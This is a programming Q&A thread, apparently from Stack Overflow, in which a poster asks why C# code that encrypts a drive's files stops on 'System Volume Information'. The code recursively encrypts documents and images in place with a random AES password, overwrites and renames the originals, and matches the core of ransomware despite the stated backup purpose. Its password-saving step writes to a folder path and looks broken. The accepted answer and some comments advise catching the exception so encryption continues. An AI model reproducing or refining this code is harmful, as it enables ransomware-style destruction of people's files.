# C# Encrypting gives unhandled exception?

Tags: c#, .net, encryption, exception

```
   public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
    {
        byte[] encryptedBytes = null;
        byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
        using (MemoryStream ms = new MemoryStream())
        {
            using (RijndaelManaged AES = new RijndaelManaged())
            {
                AES.KeySize = 256;
                AES.BlockSize = 128;

                var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
                AES.Key = key.GetBytes(AES.KeySize / 8);
                AES.IV = key.GetBytes(AES.BlockSize / 8);

                AES.Mode = CipherMode.CBC;

                using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write))
                {
                    cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
                    cs.Close();
                }
                encryptedBytes = ms.ToArray();
            }
        }

        return encryptedBytes;
    }

    public string CreatePassword(int length)
    {
        const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/";
        StringBuilder res = new StringBuilder();
        Random rnd = new Random();
        while (0 < length--)
        {
            res.Append(valid[rnd.Next(valid.Length)]);
        }
        return res.ToString();
    }

    public void SendPassword(string password)
    {
        string info = password;
        System.IO.File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.Desktop), info);
    }


    public void EncryptFile(string file, string password)
    {
            byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
            byte[] passwordBytes = Encoding.UTF8.GetBytes(password);

            // Hash the password with SHA256
            passwordBytes = SHA256.Create().ComputeHash(passwordBytes);

            byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
        File.WriteAllBytes(file, bytesEncrypted);
            File.Move(file, file+".backup");
    }

    public void encryptDirectory(string location, string password)
    {
        var validExtensions = new[]
        {
            ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".pdf", ".png"
        };

        string[] files = Directory.GetFiles(location);
        string[] childDirectories = Directory.GetDirectories(location);
            for (int i = 0; i < files.Length; i++)
            {
                string extension = Path.GetExtension(files[i]);
                if (validExtensions.Contains(extension))
                {
                    EncryptFile(files[i], password);
                }
            }
            for (int i = 0; i < childDirectories.Length; i++)
            {
                encryptDirectory(childDirectories[i], password);
            }
    }
```

So this is the code (not all, just the necessary I guess).
I want to encrypt a directory and files in that directory.

Then it saves the password in a .txt file in my desktop,so I can save and make backups(I try to do this when I clean install other OS) of my encrypted data to the cloud and pendrive.

But sometimes I also try to encrypt my pendrive and I get an unhandled exception (Access to the path "E:\System Volume Information" is denied) - no problem..I don´t want a backup of that folder anyway but the encryption stops there and I want it to ignore that folder and keep goin on with the encryption to the others.

I tried a lot of things and searched a lot but I don´t know what to do. Any help appreciated and sorry for so long "story".
SOrry horrible english.

**EDITED: Just found the correct place to use Try catch block. Sorry for any inconvenience**

Comment: Can you post the stack trace of your exception?

Comment: Not the stack trace but [the full exception details](https://blogs.msdn.microsoft.com/saraford/2008/08/07/did-you-know-you-can-copy-the-exception-details-with-one-click-from-the-exception-assistant-276/)

Comment: How about put your code inside try-catch block. Without try-catch block, there will be unhandled exception, that is bad.

Comment: What have you tried? It seems like the obvious thing is that when you are looping through the directories you can just check if it is "System Volume Information" and just not process that directory. This feels obvious enough that I'm sure you must have tried it though so I assume you had some problem using this method?

Comment: Also move the `Random rnd = new Random();` out of `CreatePassword` so that you only have one random number generator. If you don't do this then repeatedly calling `CreatePassword` will generate the same password.

Comment: @x... I was going to suggest the same thing actually. Also, Paulo - can you clarify whether you're asking us to help you figure out how to handle the exception you're describing once you get it, how to avoid it in the first place, or both? Are you trying to get the encryption for "E:\System Volume Information" working or you don't care at this point?

Comment: Im kinda confused because this code was with me and my uncle that is teaching me how to code, actually im kinda new in c#, but I don´t have his help lately. I tried try catch block but Im not sure where to use it or which code should I do that with. @Ejoshua, I dont really want to encrypt "E:\System volume information" but to skip it and if that happens for some reason with any other folder just ignore and encrypt the rest.
sorry bad english and all this confusion. I should not complicate when asking questions or people won´t help.

Comment: @moderators - why was this marked as off topic? He does, in fact, describe a specific issue that was occurring.

Answer (score 0, accepted):

If you want to skip a directory if there's an exception, just use a try/catch block inside the method where you're getting the exception so you can carry on after the exception.

Alternatively, if you know in advance that you don't have access to certain folders (e.g. if you don't have access to anything on the "E:\" drive) you can just skip it when you're encrypting.